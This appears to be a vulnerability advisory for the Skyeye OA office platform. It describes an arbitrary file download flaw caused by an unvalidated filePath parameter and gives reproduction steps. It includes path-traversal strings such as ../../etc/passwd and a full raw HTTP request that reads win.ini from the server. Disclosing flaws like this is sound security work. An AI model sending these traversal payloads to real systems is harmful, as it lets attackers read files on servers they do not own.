Skyeye has an arbitrary file download vulnerability

Product Introduction

Skyeye Cloud-Intelligent Office OA System [SpringBoot2-Rapid Development Platform] is designed for management in institutions such as hospitals, schools, and small-to-medium enterprises. It integrates diverse advanced functionalities including online file operations, log management, attendance tracking, CRM, ERP inventory management, project management, drag-and-drop questionnaire builder, scheduling, note-taking, task planning, administrative functions, and other complex business processes.

Vulnerability Analysis

\skyeye\skyeye-promote\skyeye-code-doc\src\main\java\com\skyeye\eve\controller\CodeModelHistoryController.java

\skyeye\skyeye-promote\skyeye-code-doc\src\main\java\com\skyeye\eve\service\impl\CodeModelHistoryServiceImpl.java

After receiving the filePath parameter submitted by a user, the system does not implement any security filtering measures (such as path normalization, blacklist validation, etc.). Instead, it directly concatenates the parameter with the base directory path as a string and executes file download operations based on the resulting full path. Due to the lack of validation for user input legitimacy, attackers can craft malicious parameters containing path traversal sequences (e.g., ../../etc/passwd) to achieve arbitrary file downloads from the server.

Vulnerability Reproduction

Configuration templates and code generation options can be freely entered. After clicking “Download,” intercept the network traffic (e.g., via packet capture tools), modify the filePath parameter to include path traversal sequences (e.g., ../../etc/passwd), and exploit the vulnerability to achieve arbitrary file downloads from the server.

Payload

GET /dev/reqBase/codemodel017?filePath=../../../../../Windows/win.ini HTTP/1.1
Host: 
Connection: keep-alive
sec-ch-ua: "Not(A:Brand";v="99", "Google Chrome";v="133", "Chromium";v="133"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://119.91.201.97:8088/
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: HttpOnly